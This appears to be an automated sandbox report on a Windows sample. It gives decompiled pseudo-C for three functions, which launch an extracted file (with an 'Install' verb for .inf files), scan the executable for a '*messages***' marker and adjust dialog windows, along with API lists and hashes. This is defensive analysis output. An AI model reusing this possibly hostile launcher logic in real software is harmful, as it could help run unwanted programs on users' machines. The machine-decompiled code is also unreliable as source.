Associated: 00000000.00000002.647031779.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.647066538.000000000042A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.647072384.000000000042F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.647090561.000000000044E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.647103322.0000000000451000.00000002.00020000.sdmp Download File

Similarity

API ID: _wcslen$File$AttributesMessageSendTextWindow_wcscat_wcscpy$DeleteEnvironmentExpandH_prologItemOperationStrings_memset_realloc_wcsrchr
String ID: "$%s.%d.tmp$<br>$C:\Users\user\AppData\Roaming$ProgramFilesDir$Software\Microsoft\Windows\CurrentVersion$\
API String ID: 3339014310-3874508872
Opcode ID: c149aff741a50ac64a82183471d6e0aab4f6d4480930254ee98c4ef87b3bf1d8
Instruction ID: 0e3830c9aa690b8d24ea8c25ae812e69a07397db63f2e7befb08e239689f7322
Opcode Fuzzy Hash: c149aff741a50ac64a82183471d6e0aab4f6d4480930254ee98c4ef87b3bf1d8
Instruction Fuzzy Hash: FDF180B19002199BDF20DBA1DC45FEE77B8BF04304F4448BBF605B21D1EB789A998B59

Uniqueness

Uniqueness Score: -1.00%

Function 0040E152, Relevance: 22.9, APIs: 11, Strings: 2, Instructions: 191
windowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040E152(signed short* __ecx, struct HWND__* _a4, char _a8) {
				char _v5;
				intOrPtr _v12;
				long _v16;
				struct _SHELLEXECUTEINFOW _v76;
				char _v4172;
				char _v8268;
				void* __edi;
				void* _t63;
				signed int _t66;
				intOrPtr _t67;
				int _t70;
				intOrPtr _t80;
				signed short* _t92;
				void* _t96;
				signed int _t100;
				signed short* _t101;
				signed short _t103;
				long _t105;
				signed short* _t108;

				_t63 = E0041A3E0(0x2048);
				_t108 = __ecx;
				if( *((intOrPtr*)(__ecx)) == 0) {
					L53:
					return _t63;
				}
				_t63 = E0041A0A7(__ecx);
				if(_t63 >= 0x7f6) {
					goto L53;
				} else {
					_t105 = 0x3c;
					E0041A110(_t105,  &_v76, 0, _t105);
					_t100 =  *_t108 & 0x0000ffff;
					_v76.cbSize = _t105;
					_v76.fMask = 0x1c0;
					if(_t100 != 0x22) {
						_v76.lpFile = _t108;
					} else {
						_v76.lpFile =  &(_t108[1]);
					}
					_t66 = 0;
					if(_t100 == 0) {
						L20:
						if(_v76.lpParameters == 0 && _a8 == 0 &&  *0x441d32 != 0) {
							_v76.lpParameters = 0x441d32;
						}
						_v76.nShow = 1;
						_t67 = E0040A25D(_v76.lpFile);
						_v12 = _t67;
						if(_t67 != 0 && E004119A6(_t67, L".inf") == 0) {
							_v76.lpVerb = L"Install";
						}
						_t96 = E00409026(_v76.lpFile);
						if(_t96 != 0) {
							E0040A72F(_t105, _v76.lpFile,  &_v8268, 0x800);
							_v76.lpFile =  &_v8268;
						}
						_t106 = L".exe";
						if(_a8 == 0 || _t96 != 0) {
							L32:
							_t70 = ShellExecuteExW( &_v76); // executed
							if(_t70 == 0) {
								goto L52;
							}
							_v5 = 0;
							if( *0x440d28 != 0 || _a8 != 0 ||  *0x440d11 != 0) {
								if(_a4 != 0 && IsWindowVisible(_a4) != 0) {
									ShowWindow(_a4, 0);
									_v5 = 1;
								}
								WaitForInputIdle(_v76.hProcess, 0x7d0);
								E0040D544(_v76.hProcess);
								if( *0x440d11 != 0 && GetExitCodeProcess(_v76.hProcess,  &_v16) != 0) {
									_t80 = _v16 + 0x3e8;
									if(_t80 >  *0x440d14) {
										 *0x440d14 = _t80;
									}
								}
							}
							_t70 = CloseHandle(_v76.hProcess);
							if(_v12 == 0) {
								L45:
								if( *0x440d28 == 0 || _a8 != 0) {
									_t70 = ((0 | _a8 == 0x00000000) - 0x00000001 & 0xfffffce0) + 0x3e8;
									 *0x440d18 = _t70;
								} else {
									 *0x440d18 = 0x1b58;
								}
								goto L49;
							} else {
								_t70 = E004119A6(_v12, _t106);
								if(_t70 == 0) {
									L49:
									if(_v5 != 0 && _a8 != 0) {
										_t70 = ShowWindow(_a4, 1);
									}
									goto L52;
								}
								goto L45;
							}
						} else {
							E0041A0EF( &_v4172, _v76.lpFile);
							E0041A0C1( &_v4172, L".exe");
							_t70 = E00409026( &_v4172);
							if(_t70 == 0) {
								L52:
								return _t70;
							}
							goto L32;
						}
					}
					_t101 = _t108;
					do {
						if( *_t101 != 0x22) {
							L13:
							if(_t108[_t66] == 0x20 ||  *((short*)(_t108 + 2 + _t66 * 2)) == 0x2f) {
								_t92 =  &(_t108[_t66]);
								if( *_t92 == 0x20) {
									 *_t92 = 0;
								}
								_v76.lpParameters =  &(_t92[1]);
								goto L20;
							} else {
								goto L15;
							}
						}
						while(1) {
							_t66 = _t66 + 1;
							if(_t108[_t66] == 0) {
								break;
							}
							if(_t108[_t66] == 0x22) {
								_t103 = 0x20;
								_t108[_t66] = _t103;
								goto L13;
							}
						}
						goto L13;
						L15:
						_t66 = _t66 + 1;
						_t101 =  &(_t108[_t66]);
					} while ( *_t101 != 0);
					goto L20;
				}
			}

0x0040e15a
0x0040e161
0x0040e168
0x0040e3b5
0x0040e3b5
0x0040e3b5
0x0040e16f
0x0040e17a
0x00000000
0x0040e180
0x0040e183
0x0040e18a
0x0040e18f
0x0040e195
0x0040e198
0x0040e1a3
0x0040e1ad
0x0040e1a5
0x0040e1a8
0x0040e1a8
0x0040e1b0
0x0040e1b5
0x0040e206
0x0040e209
0x0040e219
0x0040e219
0x0040e223
0x0040e22a
0x0040e22f
0x0040e234
0x0040e245
0x0040e245
0x0040e254
0x0040e258
0x0040e269
0x0040e274
0x0040e274
0x0040e27b
0x0040e280
0x0040e2b9
0x0040e2bd
0x0040e2c5
0x00000000
0x00000000
0x0040e2d8
0x0040e2e1
0x0040e2f6
0x0040e30a
0x0040e30c
0x0040e30c
0x0040e318
0x0040e321
0x0040e32d
0x0040e343
0x0040e34b
0x0040e34d
0x0040e34d
0x0040e34b
0x0040e32d
0x0040e355
0x0040e35f
0x0040e36e
0x0040e375
0x0040e397
0x0040e399
0x0040e37d
0x0040e37d
0x0040e37d
0x00000000
0x0040e361
0x0040e365
0x0040e36c
0x0040e39e
0x0040e3a2
0x0040e3af
0x0040e3af
0x00000000
0x0040e3a2
0x00000000
0x0040e36c
0x0040e286
0x0040e290
0x0040e29d
0x0040e2ac
0x0040e2b3
0x0040e3b1
0x00000000
0x0040e3b1
0x00000000
0x0040e2b3
0x0040e280
0x0040e1b7
0x0040e1b9
0x0040e1bd
0x0040e1d8
0x0040e1dd
0x0040e1f2
0x0040e1f9
0x0040e1fd
0x0040e1fd
0x0040e203
0x00000000
0x00000000
0x00000000
0x00000000
0x0040e1dd
0x0040e1c8
0x0040e1c8
0x0040e1cd
0x00000000
0x00000000
0x0040e1c6
0x0040e1d3
0x0040e1d4
0x00000000
0x0040e1d4
0x0040e1c6
0x00000000
0x0040e1e7
0x0040e1e7
0x0040e1e8
0x0040e1eb
0x00000000
0x0040e1f0

APIs

_wcslen.LIBCMT ref: 0040E16F
_memset.LIBCMT ref: 0040E18A
_wcscpy.LIBCMT ref: 0040E290
_wcscat.LIBCMT ref: 0040E29D
ShellExecuteExW.SHELL32(?), ref: 0040E2BD
IsWindowVisible.USER32(00000000), ref: 0040E2FB
ShowWindow.USER32(00000000,00000000), ref: 0040E30A
WaitForInputIdle.USER32 ref: 0040E318
GetExitCodeProcess.KERNEL32 ref: 0040E336
CloseHandle.KERNEL32(?), ref: 0040E355
ShowWindow.USER32(00000000,00000001), ref: 0040E3AF

Strings

.exe, xrefs: 0040E27B, 0040E29B, 0040E361
.inf, xrefs: 0040E236

Memory Dump Source

Source File: 00000000.00000002.647038187.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.647031779.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.647066538.000000000042A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.647072384.000000000042F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.647090561.000000000044E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.647103322.0000000000451000.00000002.00020000.sdmp Download File

Similarity

API ID: Window$Show$CloseCodeExecuteExitHandleIdleInputProcessShellVisibleWait_memset_wcscat_wcscpy_wcslen
String ID: .exe$.inf
API String ID: 2379411779-3750412487
Opcode ID: 02f2ab187e42add2440ab3dad95d225dcc2b095990e7b67976a9926e87617da9
Instruction ID: 2b554684b3b7fa7c3e482825effa618ca30e85f17f123b9c17357ee9e3710ef8
Opcode Fuzzy Hash: 02f2ab187e42add2440ab3dad95d225dcc2b095990e7b67976a9926e87617da9
Instruction Fuzzy Hash: 2E61A770D00218AADF21ABA6D8447AE7BB8AF01304F144C7BE941B72E1D77D59E9CB49

Uniqueness

Uniqueness Score: -1.00%

Function 0040B8D7, Relevance: 21.2, APIs: 9, Strings: 3, Instructions: 240
COMMON

Download Yara Rule

C-Code - Quality: 83%

			E0040B8D7(intOrPtr* __ecx, void* __edx) {
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t82;
				WCHAR* _t83;
				intOrPtr _t90;
				void* _t91;
				unsigned int _t92;
				signed int _t100;
				intOrPtr _t102;
				intOrPtr _t104;
				intOrPtr _t106;
				signed int _t114;
				void* _t115;
				signed int _t116;
				signed int _t119;
				void* _t134;
				signed int _t139;
				signed int _t141;
				void* _t150;
				signed int _t153;
				signed int _t154;
				intOrPtr _t156;
				signed int _t158;
				signed int _t159;
				signed int _t160;
				signed int _t161;
				intOrPtr* _t165;
				void* _t167;
				void* _t169;

				_t150 = __edx;
				E00419DD4(E004292BA, _t167);
				E0041A3E0(0x4034);
				_t165 = __ecx;
				_t82 = E0041C359( *((intOrPtr*)(_t167 + 8)), 0x5c);
				_t83 = _t167 - 0x2040;
				if(_t82 != 0) {
					L3:
					E0041A0EF(_t83,  *((intOrPtr*)(_t167 + 8)));
					E00408533(_t167 - 0x1040);
					_push(4);
					_t123 = 0;
					_push(_t167 - 0x2040);
					 *(_t167 - 4) = 0;
					if(E00408570(_t167 - 0x1040) != 0) {
						_t12 = _t167 - 0x10;
						 *_t12 =  *(_t167 - 0x10) | 0xffffffff;
						__eflags =  *_t12;
						 *((char*)(_t167 + 0xb)) = 0;
						 *((intOrPtr*)(_t167 - 0x14)) = 0;
						_push(_t154);
						while(1) {
							__eflags =  *(_t167 - 0x10) - 0xffffffff;
							if( *(_t167 - 0x10) != 0xffffffff) {
								break;
							}
							_t104 = E0040892A(_t167 - 0x1040, _t150); // executed
							 *((intOrPtr*)(_t167 - 0x1c)) = _t104;
							_t143 = _t167 - 0x1040;
							_t106 = E00408BFC(_t167 - 0x1040, _t150, _t167 - 0x4040, 0x2000); // executed
							 *((intOrPtr*)(_t167 - 0x18)) = _t106;
							_t154 = 0;
							__eflags = _t106 + 0xfffffff0 - _t123;
							if(_t106 + 0xfffffff0 < _t123) {
								L22:
								_t123 = 0;
								E00408D6E(_t167 - 0x1040,  *((intOrPtr*)(_t167 - 0x18)) +  *((intOrPtr*)(_t167 - 0x1c)) - 0x10, 0, 0);
								 *((intOrPtr*)(_t167 - 0x14)) =  *((intOrPtr*)(_t167 - 0x14)) + 1;
								__eflags =  *((intOrPtr*)(_t167 - 0x14)) - 0x80;
								if( *((intOrPtr*)(_t167 - 0x14)) < 0x80) {
									continue;
								} else {
									__eflags =  *(_t167 - 0x10) - 0xffffffff;
									if( *(_t167 - 0x10) == 0xffffffff) {
										goto L51;
									} else {
										break;
									}
								}
							} else {
								do {
									_t123 = _t167 + _t154 - 0x4040;
									__eflags =  *_t123 - 0x2a;
									if( *_t123 != 0x2a) {
										L11:
										__eflags =  *_t123 - 0x2a;
										if( *_t123 != 0x2a) {
											L15:
											__eflags =  *_t123 - 0x52;
											if( *_t123 != 0x52) {
												goto L18;
											} else {
												__eflags =  *((char*)(_t167 + _t154 - 0x403f)) - 0x61;
												if( *((char*)(_t167 + _t154 - 0x403f)) != 0x61) {
													goto L18;
												} else {
													_t114 = E0041C938(_t143, _t167 + _t154 - 0x403e, 0x42a6bc, 4);
													_t169 = _t169 + 0xc;
													__eflags = _t114;
													if(_t114 == 0) {
														L51:
														_t134 = _t167 - 0x1040;
													} else {
														goto L18;
													}
												}
											}
										} else {
											_t115 = _t167 + _t154 - 0x403c;
											__eflags =  *((short*)(_t115 - 2)) - 0x2a;
											if( *((short*)(_t115 - 2)) != 0x2a) {
												goto L15;
											} else {
												_t143 =  *((intOrPtr*)(_t167 - 0x18)) + 0xffffffe0;
												__eflags = _t154 -  *((intOrPtr*)(_t167 - 0x18)) + 0xffffffe0;
												if(_t154 >  *((intOrPtr*)(_t167 - 0x18)) + 0xffffffe0) {
													goto L15;
												} else {
													_t116 = E0041C28A(_t115, L"*messages***", 0xb);
													_t169 = _t169 + 0xc;
													__eflags = _t116;
													if(_t116 == 0) {
														 *((char*)(_t167 + 0xb)) = 1;
														goto L21;
													} else {
														goto L15;
													}
												}
											}
										}
									} else {
										__eflags =  *((char*)(_t167 + _t154 - 0x403f)) - 0x2a;
										if( *((char*)(_t167 + _t154 - 0x403f)) != 0x2a) {
											goto L11;
										} else {
											_t119 = E0041C938(_t143, _t167 + _t154 - 0x403e, "*messages***", 0xb);
											_t169 = _t169 + 0xc;
											__eflags = _t119;
											if(_t119 == 0) {
												L21:
												_t154 = _t154 +  *((intOrPtr*)(_t167 - 0x1c));
												__eflags = _t154;
												 *(_t167 - 0x10) = _t154;
												goto L22;
											} else {
												goto L11;
											}
										}
									}
									goto L52;
									L18:
									_t154 = _t154 + 1;
									__eflags = _t154 -  *((intOrPtr*)(_t167 - 0x18)) + 0xfffffff0;
								} while (_t154 <=  *((intOrPtr*)(_t167 - 0x18)) + 0xfffffff0);
								goto L22;
							}
							L52:
							_t75 = _t167 - 4;
							 *_t75 =  *(_t167 - 4) | 0xffffffff;
							__eflags =  *_t75;
							_t91 = E004089F9(_t123, _t134);
							goto L53;
						}
						asm("cdq");
						E00408D6E(_t167 - 0x1040,  *(_t167 - 0x10), _t150, _t123);
						_t90 = E0041C86E(_t123, _t150, _t154, 0x80002);
						 *_t165 = _t90;
						_t134 = _t167 - 0x1040;
						__eflags = _t90 - _t123;
						if(_t90 != _t123) {
							_t92 = E00408BFC(_t134, _t150, _t90, 0x80000);
							__eflags =  *((char*)(_t167 + 0xb));
							 *(_t165 + 4) = _t92;
							if( *((char*)(_t167 + 0xb)) == 0) {
								_t156 = E0041C86E(_t123, _t150, _t154, _t92 + _t92 + 2);
								__eflags = _t156 - _t123;
								if(_t156 != _t123) {
									 *((char*)( *(_t165 + 4) +  *_t165)) = 0;
									__eflags =  *(_t165 + 4) + 1;
									E00411682( *_t165, _t156,  *(_t165 + 4) + 1);
									_push( *_t165);
									E00419DFE(_t123, _t156, _t165, __eflags);
									 *_t165 = _t156;
									goto L29;
								}
							} else {
								 *(_t165 + 4) = _t92 >> 1;
								L29:
								_t139 =  *(_t165 + 4);
								_t100 = 0x40000;
								__eflags = _t139 - 0x40000;
								if(_t139 <= 0x40000) {
									_t100 = _t139;
								}
								 *((short*)( *_t165 + _t100 * 2)) = 0;
								_t141 = 0;
								__eflags =  *(_t165 + 4);
								if( *(_t165 + 4) > 0) {
									while(1) {
										_t102 =  *_t165;
										_t153 =  *(_t102 + _t123 * 2) & 0x0000ffff;
										_t123 = _t123 + 1;
										__eflags = _t153;
										if(_t153 == 0) {
											goto L50;
										}
										__eflags = _t153 - 0x5c;
										if(_t153 != 0x5c) {
											__eflags = _t153 - 0xd;
											if(_t153 == 0xd) {
												L47:
												_push(0xc);
												goto L48;
											} else {
												__eflags = _t153 - 0xa;
												if(_t153 == 0xa) {
													goto L47;
												}
											}
										} else {
											_t158 = ( *(_t102 + _t123 * 2) & 0x0000ffff) - 0x22;
											__eflags = _t158;
											if(_t158 == 0) {
												_push(0x22);
												goto L44;
											} else {
												_t159 = _t158 - 0x3a;
												__eflags = _t159;
												if(_t159 == 0) {
													_push(0x5c);
													goto L44;
												} else {
													_t160 = _t159 - 0x12;
													__eflags = _t160;
													if(_t160 == 0) {
														_push(0xa);
														goto L44;
													} else {
														_t161 = _t160 - 4;
														__eflags = _t161;
														if(_t161 == 0) {
															_push(0xd);
															goto L44;
														} else {
															__eflags = _t161 == 0;
															if(_t161 == 0) {
																_push(9);
																L44:
																_t123 = _t123 + 1;
																L48:
																_pop(_t153);
															}
														}
													}
												}
											}
										}
										 *(_t102 + _t141 * 2) = _t153;
										_t141 = _t141 + 1;
										__eflags = _t123 -  *(_t165 + 4);
										if(_t123 <  *(_t165 + 4)) {
											continue;
										}
										goto L50;
									}
								}
								L50:
								__eflags = 0;
								 *((short*)( *_t165 + _t141 * 2)) = 0;
								 *(_t165 + 4) = _t141;
							}
							goto L51;
						}
						goto L52;
					} else {
						 *(_t167 - 4) =  *(_t167 - 4) | 0xffffffff;
						_t91 = E004089F9(0, _t167 - 0x1040);
					}
					L53:
				} else {
					GetModuleFileNameW(0, _t83, 0x800);
					_t91 = E0041C37F(_t167 - 0x2040, 0x5c);
					if(_t91 != 0) {
						_t83 = _t91 + 2;
						goto L3;
					}
				}
				 *[fs:0x0] =  *((intOrPtr*)(_t167 - 0xc));
				return _t91;
			}

0x0040b8d7
0x0040b8dc
0x0040b8e6
0x0040b8f1
0x0040b8f3
0x0040b8fc
0x0040b902
0x0040b92d
0x0040b931
0x0040b93f
0x0040b944
0x0040b94c
0x0040b94e
0x0040b955
0x0040b95f
0x0040b975
0x0040b975
0x0040b975
0x0040b979
0x0040b97c
0x0040b97f
0x0040b980
0x0040b980
0x0040b984
0x00000000
0x00000000
0x0040b990
0x0040b995
0x0040b9a4
0x0040b9aa
0x0040b9af
0x0040b9b5
0x0040b9b7
0x0040b9b9
0x0040ba6d
0x0040ba73
0x0040ba82
0x0040ba87
0x0040ba8a
0x0040ba91
0x00000000
0x0040ba97
0x0040ba97
0x0040ba9b
0x00000000
0x00000000
0x00000000
0x00000000
0x0040ba9b
0x0040b9bf
0x0040b9bf
0x0040b9bf
0x0040b9c6
0x0040b9c9
0x0040b9f0
0x0040b9f0
0x0040b9f4
0x0040ba22
0x0040ba22
0x0040ba25
0x00000000
0x0040ba27
0x0040ba27
0x0040ba2f
0x00000000
0x0040ba31
0x0040ba40
0x0040ba45
0x0040ba48
0x0040ba4a
0x0040bba2
0x0040bba2
0x00000000
0x00000000
0x00000000
0x0040ba4a
0x0040ba2f
0x0040b9f6
0x0040b9f6
0x0040b9fd
0x0040ba02
0x00000000
0x0040ba04
0x0040ba07
0x0040ba0a
0x0040ba0c
0x00000000
0x0040ba0e
0x0040ba16
0x0040ba1b
0x0040ba1e
0x0040ba20
0x0040ba61
0x00000000
0x00000000
0x00000000
0x00000000
0x0040ba20
0x0040ba0c
0x0040ba02
0x0040b9cb
0x0040b9cb
0x0040b9d3
0x00000000
0x0040b9d5
0x0040b9e4
0x0040b9e9
0x0040b9ec
0x0040b9ee
0x0040ba65
0x0040ba68
0x0040ba68
0x0040ba6a
0x00000000
0x00000000
0x00000000
0x00000000
0x0040b9ee
0x0040b9d3
0x00000000
0x0040ba50
0x0040ba53
0x0040ba57
0x0040ba57
0x00000000
0x0040ba5f
0x0040bba8
0x0040bba8
0x0040bba8
0x0040bba8
0x0040bbac
0x00000000
0x0040bbb1
0x0040baa4
0x0040baae
0x0040bab8
0x0040babe
0x0040bac0
0x0040bac6
0x0040bac8
0x0040bad4
0x0040bad9
0x0040badd
0x0040bae0
0x0040baf3
0x0040baf6
0x0040baf8
0x0040bb03
0x0040bb0a
0x0040bb0f
0x0040bb14
0x0040bb16
0x0040bb1c
0x00000000
0x0040bb1c
0x0040bae2
0x0040bae4
0x0040bb1e
0x0040bb1e
0x0040bb21
0x0040bb26
0x0040bb28
0x0040bb2a
0x0040bb2a
0x0040bb30
0x0040bb34
0x0040bb36
0x0040bb39
0x0040bb3b
0x0040bb3b
0x0040bb3d
0x0040bb41
0x0040bb42
0x0040bb45
0x00000000
0x00000000
0x0040bb47
0x0040bb4b
0x0040bb7e
0x0040bb82
0x0040bb8a
0x0040bb8a
0x00000000
0x0040bb84
0x0040bb84
0x0040bb88
0x00000000
0x00000000
0x0040bb88
0x0040bb4d
0x0040bb51
0x0040bb51
0x0040bb54
0x0040bb79
0x00000000
0x0040bb56
0x0040bb56
0x0040bb56
0x0040bb59
0x0040bb75
0x00000000
0x0040bb5b
0x0040bb5b
0x0040bb5b
0x0040bb5e
0x0040bb71
0x00000000
0x0040bb60
0x0040bb60
0x0040bb60
0x0040bb63
0x0040bb6d
0x00000000
0x0040bb65
0x0040bb66
0x0040bb67
0x0040bb69
0x0040bb7b
0x0040bb7b
0x0040bb8c
0x0040bb8c
0x0040bb8c
0x0040bb67
0x0040bb63
0x0040bb5e
0x0040bb59
0x0040bb54
0x0040bb8d
0x0040bb91
0x0040bb92
0x0040bb95
0x00000000
0x00000000
0x00000000
0x0040bb95
0x0040bb3b
0x0040bb97
0x0040bb99
0x0040bb9b
0x0040bb9f
0x0040bb9f
0x00000000
0x0040bae0
0x00000000
0x0040b961
0x0040b961
0x0040b96b
0x0040b96b
0x0040bbb2
0x0040b904
0x0040b90c
0x0040b91b
0x0040b924
0x0040b92a
0x00000000
0x0040b92a
0x0040b924
0x0040bbb7
0x0040bbbf

APIs

__EH_prolog.LIBCMT ref: 0040B8DC
_wcschr.LIBCMT ref: 0040B8F3
GetModuleFileNameW.KERNEL32(00000000,?,00000800,00432A7C,0040C051,0040FC5B,00438CD8,0040FC5B,00438CD8), ref: 0040B90C
_wcsrchr.LIBCMT ref: 0040B91B
_wcscpy.LIBCMT ref: 0040B931
_malloc.LIBCMT ref: 0040BAB8

Part of subcall function 0040892A: SetFilePointer.KERNELBASE(?,00000000,?,00000001), ref: 0040895D
Part of subcall function 0040892A: GetLastError.KERNEL32(?,?), ref: 0040896A

_strncmp.LIBCMT ref: 0040B9E4
_strncmp.LIBCMT ref: 0040BA40
_malloc.LIBCMT ref: 0040BAEE

Strings

a, xrefs: 0040BA27
*messages***, xrefs: 0040B9DE
*messages***, xrefs: 0040BA10

Memory Dump Source

Source File: 00000000.00000002.647038187.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.647031779.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.647066538.000000000042A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.647072384.000000000042F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.647090561.000000000044E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.647103322.0000000000451000.00000002.00020000.sdmp Download File

Similarity

API ID: File_malloc_strncmp$ErrorH_prologLastModuleNamePointer_wcschr_wcscpy_wcsrchr
String ID: *messages***$*messages***$a
API String ID: 644328012-1639468518
Opcode ID: d8bf6d3b2fae61680ee1cb517b7c0d961ba983bdd429348d11702753e6c2d044
Instruction ID: 1e24f69919584fda034585d87c7e51dd8931d06dcadfc14a251243c3b72de151
Opcode Fuzzy Hash: d8bf6d3b2fae61680ee1cb517b7c0d961ba983bdd429348d11702753e6c2d044
Instruction Fuzzy Hash: 6781CFB1A002099BDB349F64CC81FAA77B4EF10310F10457FE691B72D6DB789A84CA8D

Uniqueness

Uniqueness Score: -1.00%

Function 0040BDF9, Relevance: 21.2, APIs: 14, Instructions: 205
COMMON

Download Yara Rule

C-Code - Quality: 69%

			E0040BDF9(intOrPtr __ecx, void* __edx, void* __eflags, signed int _a4, intOrPtr _a8, struct HWND__* _a12) {
				char _v5;
				struct HWND__* _v12;
				signed int _v16;
				signed int _v20;
				int _v24;
				int _v28;
				int _v32;
				intOrPtr _v36;
				struct tagRECT _v52;
				struct tagRECT _v68;
				struct tagRECT _v84;
				short _v2132;
				signed int _t115;
				struct HWND__* _t117;
				signed int _t135;
				signed int _t159;
				struct HWND__* _t173;
				signed int _t174;
				int _t177;
				void* _t181;
				signed int _t182;
				signed int _t185;
				signed int _t194;
				void* _t196;
				void* _t197;
				void* _t200;
				int _t201;
				int _t204;

				_v36 = __ecx;
				_v5 = E0040BD12(__ecx, __edx, _a8,  &_v20,  &_v16);
				GetWindowRect(_a4,  &_v52);
				GetClientRect(_a4,  &_v84);
				_t115 = _v84.right;
				_t181 = _v52.right - _v52.left + 1;
				_t200 = _v52.bottom - _v52.top + 1;
				_t196 = _t200 - _v84.bottom;
				_t173 = _t181 - _t115;
				_v12 = _t173;
				if(_v5 == 0) {
					L9:
					_t201 = 0x400;
					if(_a12 == 0) {
						GetWindowTextW(_a4,  &_v2132, 0x400);
						E0040BBC2(_v36,  &_v2132,  &_v2132, 0x400, 1, _a8);
						SetWindowTextW(_a4,  &_v2132); // executed
					}
					L12:
					_t197 = _t196 - GetSystemMetrics(8);
					_t117 = GetWindow(_a4, 5);
					_a4 = _a4 & 0x00000000;
					_a12 = _t117;
					_v12 = _t117;
					while(_t117 != 0) {
						if(_a4 >= 0x200) {
							break;
						}
						GetWindowTextW(_a12,  &_v2132, _t201);
						if(_v2132 != 0) {
							E0040BBC2(_v36,  &_v2132,  &_v2132, _t201, 1, _a8);
							SetWindowTextW(_a12,  &_v2132); // executed
						}
						if(_v5 != 0) {
							GetWindowRect(_a12,  &_v68);
							_push(0x204);
							asm("cdq");
							_t182 = 0x64;
							_push((_v68.bottom - _v68.top + 1) * _v16 / _t182);
							asm("cdq");
							_push((_v68.right - _v68.left + 1) * _v20 / _t182);
							_t135 = (_v68.top - _t197 - _v52.top) * _v16;
							asm("cdq");
							_push(_t135 / _t182);
							asm("cdq");
							_t185 = 0x64;
							asm("cdq");
							SetWindowPos(_a12, 0, (_v68.left - (_t173 - _t135 % _t182 >> 1) - _v52.left) * _v20 / _t185, ??, ??, ??, ??);
						}
						_t117 = GetWindow(_a12, 2);
						_a12 = _t117;
						if(_t117 == _v12) {
							break;
						} else {
							_a4 = _a4 + 1;
							continue;
						}
					}
					return _t117;
				}
				if(_a12 != 0) {
					_t201 = 0x400;
					goto L12;
				}
				asm("cdq");
				_t174 = 0x64;
				_v24 = _v12 + _t115 * _v20 / _t174;
				_t159 = _v84.bottom * _v16;
				asm("cdq");
				_t194 = _t159 % _t174;
				_v28 = _t159 / _t174 + _t196;
				asm("cdq");
				_t177 = (_t181 - _v24 - _t194 >> 1) + _v52.left;
				asm("cdq");
				_t204 = (_t200 - _v28 - _t194 >> 1) + _v52.top;
				if(_t177 < 0) {
					_t177 = 0;
				}
				if(_t204 < 0) {
					_t204 = 0;
				}
				_v32 = 0x204;
				if((GetWindowLongW(_a4, 0xfffffff0) & 0x00000800) == 0) {
					_v32 = 0x206;
				}
				SetWindowPos(_a4, 0, _t177, _t204, _v24, _v28, _v32);
				GetWindowRect(_a4,  &_v52);
				_t173 = _v12;
				goto L9;
			}

0x0040be10
0x0040be18
0x0040be22
0x0040be2f
0x0040be41
0x0040be44
0x0040be45
0x0040be4a
0x0040be4d
0x0040be53
0x0040be56
0x0040bef5
0x0040bef9
0x0040befe
0x0040bf0b
0x0040bf22
0x0040bf31
0x0040bf31
0x0040bf3e
0x0040bf4b
0x0040bf4d
0x0040bf53
0x0040bf57
0x0040bf5a
0x0040c036
0x0040bf69
0x00000000
0x00000000
0x0040bf7a
0x0040bf88
0x0040bf9b
0x0040bfaa
0x0040bfaa
0x0040bfb4
0x0040bfbd
0x0040bfc9
0x0040bfd3
0x0040bfd6
0x0040bfd9
0x0040bfe5
0x0040bfe8
0x0040bff1
0x0040bff5
0x0040bff8
0x0040bffb
0x0040c010
0x0040c011
0x0040c01a
0x0040c01a
0x0040c025
0x0040c02b
0x0040c031
0x00000000
0x0040c033
0x0040c033
0x00000000
0x0040c033
0x0040c031
0x0040c042
0x0040c042
0x0040be60
0x0040bf39
0x00000000
0x0040bf39
0x0040be6a
0x0040be6d
0x0040be73
0x0040be79
0x0040be7d
0x0040be7e
0x0040be82
0x0040be8a
0x0040be96
0x0040be99
0x0040bea0
0x0040bea5
0x0040bea7
0x0040bea7
0x0040beab
0x0040bead
0x0040bead
0x0040beb4
0x0040bec6
0x0040bec8
0x0040bec8
0x0040bedf
0x0040beec
0x0040bef2
0x00000000

APIs

Part of subcall function 0040BD12: _wcschr.LIBCMT ref: 0040BD42

GetWindowRect.USER32 ref: 0040BE22
GetClientRect.USER32 ref: 0040BE2F
GetWindowLongW.USER32(?,000000F0), ref: 0040BEBB
SetWindowPos.USER32(?,00000000,?,?,?,?,00000204), ref: 0040BEDF
GetWindowRect.USER32 ref: 0040BEEC
GetWindowTextW.USER32 ref: 0040BF0B
SetWindowTextW.USER32(?,?), ref: 0040BF31
GetSystemMetrics.USER32 ref: 0040BF40
GetWindow.USER32(?,00000005), ref: 0040BF4D
GetWindowTextW.USER32 ref: 0040BF7A
SetWindowTextW.USER32(00000000,00000000), ref: 0040BFAA
GetWindowRect.USER32 ref: 0040BFBD
SetWindowPos.USER32(00000000,00000000,00000000,00000110,00000000,00000110,00000204), ref: 0040C01A
GetWindow.USER32(00000000,00000002), ref: 0040C025

Memory Dump Source

Source File: 00000000.00000002.647038187.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.647031779.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.647066538.000000000042A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.647072384.000000000042F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.647090561.000000000044E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.647103322.0000000000451000.00000002.00020000.sdmp Download File

Similarity

API ID: Window$RectText$ClientLongMetricsSystem_wcschr
String ID:
API String ID: 4134264131-0
Opcode ID: 07c939b3e0de819aef1e3ff051874ba9b5d8955eaed63074634a2a3568144a6a
